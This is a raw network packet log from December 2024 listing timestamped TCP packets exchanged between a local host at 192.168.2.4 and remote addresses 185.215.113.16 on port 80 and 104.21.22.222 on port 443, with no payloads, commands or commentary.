Dec 14, 2024 23:58:38.837871075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.837927103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.838012934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.838054895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.838922024 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.838968992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.839113951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.839236975 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.839912891 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.839967966 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.840054035 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.840105057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.840970993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.841023922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.841104031 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.841145039 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.841976881 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.842195034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.842233896 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.842967033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.843000889 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.843126059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.843169928 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.843956947 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.844012976 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.844144106 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.844188929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.845001936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.845046043 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.845134974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.845220089 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.846012115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.846064091 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.846158028 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.846251011 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.847001076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.847049952 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.847167969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.847207069 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.848046064 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.848098040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.848197937 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.848243952 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.849061012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.849109888 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.849276066 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.849459887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.850083113 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.850217104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.850256920 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.851095915 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.851135969 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.851278067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.851327896 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.852087021 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.852133036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.852231979 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.852267027 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.853099108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.853143930 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.853239059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.853282928 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.854149103 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.854310989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.854357004 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.855148077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.855194092 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.855276108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.855330944 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.856152058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.856192112 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.856302977 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.856343985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.857158899 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.857201099 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.857321024 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.857363939 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.858189106 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.858354092 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.858400106 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.859189987 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.859230995 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.859342098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.859381914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.860239029 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.860284090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.860416889 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.860470057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.861236095 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.861282110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.861401081 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.861447096 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.862245083 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.862452030 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.862498045 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.863255024 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.863308907 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.863404989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.863449097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.864262104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.864317894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.864440918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.864485025 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.865310907 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.865360022 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.865466118 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.865516901 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.866307020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.866482019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.866528034 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.867372036 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.867417097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.867568970 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.867611885 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.868339062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.868387938 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.868488073 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.868531942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.869338989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.869384050 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.869518995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.870383978 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.870441914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.870528936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.870573044 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.871409893 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.871454000 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.871545076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.871587992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.872340918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.872385025 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.011666059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.011709929 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.011734009 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.011765957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.011957884 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.012077093 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.012126923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.012870073 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.012922049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.012989998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.013031960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.013865948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.013983011 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.014031887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.014864922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.014911890 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.015007019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.015398026 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.015938997 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.015994072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.016015053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.016055107 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.016908884 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.016957045 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.017115116 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.017294884 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.017995119 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.018124104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.018145084 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.018162966 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.018938065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.018979073 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.019190073 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.019233942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.019965887 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.020042896 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.020080090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.020122051 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.021008968 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.021115065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.021173000 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.022001982 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.022131920 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.022181988 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.023022890 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.023066998 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.023147106 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.023191929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.024013042 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.024070978 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.024147034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.024280071 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.025038958 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.025089979 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.025146008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.025418043 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.026045084 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.026102066 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.026174068 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.026213884 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.027101040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.027144909 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.027189016 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.027224064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.028095961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.028140068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.028250933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.028294086 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.029087067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.029134989 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.029275894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.029316902 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.030124903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.030244112 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.030282974 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.031130075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.031171083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.031239986 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.031272888 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.032155991 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.032345057 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.032391071 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.033165932 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.033207893 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.033253908 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.033289909 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.034172058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.034270048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.034282923 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.034317017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.035172939 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.035216093 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.035324097 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.035371065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.036197901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.036319017 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.036362886 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.037209988 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.037241936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.037303925 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.037341118 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.037384033 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:39.037455082 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.038252115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.038295031 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.038391113 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.038536072 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:39.038592100 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.038650990 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.039163113 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.039273024 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.039403915 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.039427042 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.039452076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.040292025 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.040328979 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.040391922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.040395975 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:39.040426016 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.040441036 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:39.040658951 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:39.041286945 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.041344881 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.041464090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.041567087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.042304039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.042352915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.042418957 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.042717934 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.043330908 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.043492079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.043531895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.044344902 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.044388056 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.044519901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.044562101 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.045376062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.045416117 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.045461893 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.045835972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.046365023 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.046410084 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.046492100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.046547890 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.047390938 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.047436953 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.047516108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.047642946 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.048434019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.048540115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.048552036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.048593044 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.049423933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.049478054 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.049557924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.049740076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.050487041 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.050539017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.050616980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.050658941 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.051578999 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.051628113 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.051675081 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.051718950 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.052537918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.052587986 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.052650928 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.053009033 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.053494930 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.053728104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.053776026 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.054605007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.054652929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.054716110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.054759979 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.055586100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.055687904 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.055696011 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.055741072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.056593895 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.056643963 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.056715965 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.056824923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.057609081 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.057661057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.057743073 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.057795048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.058583975 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.058631897 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.058670044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.058713913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.059590101 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.059638023 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.059724092 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.059860945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.060585022 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.060810089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.060853004 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.061635971 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.061748981 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.061786890 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.062624931 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.062671900 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.062772989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.062820911 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.063659906 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.063711882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:39.063776970 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:39.063837051 CET	49841	80	192.168.2.4	185.215.113.16
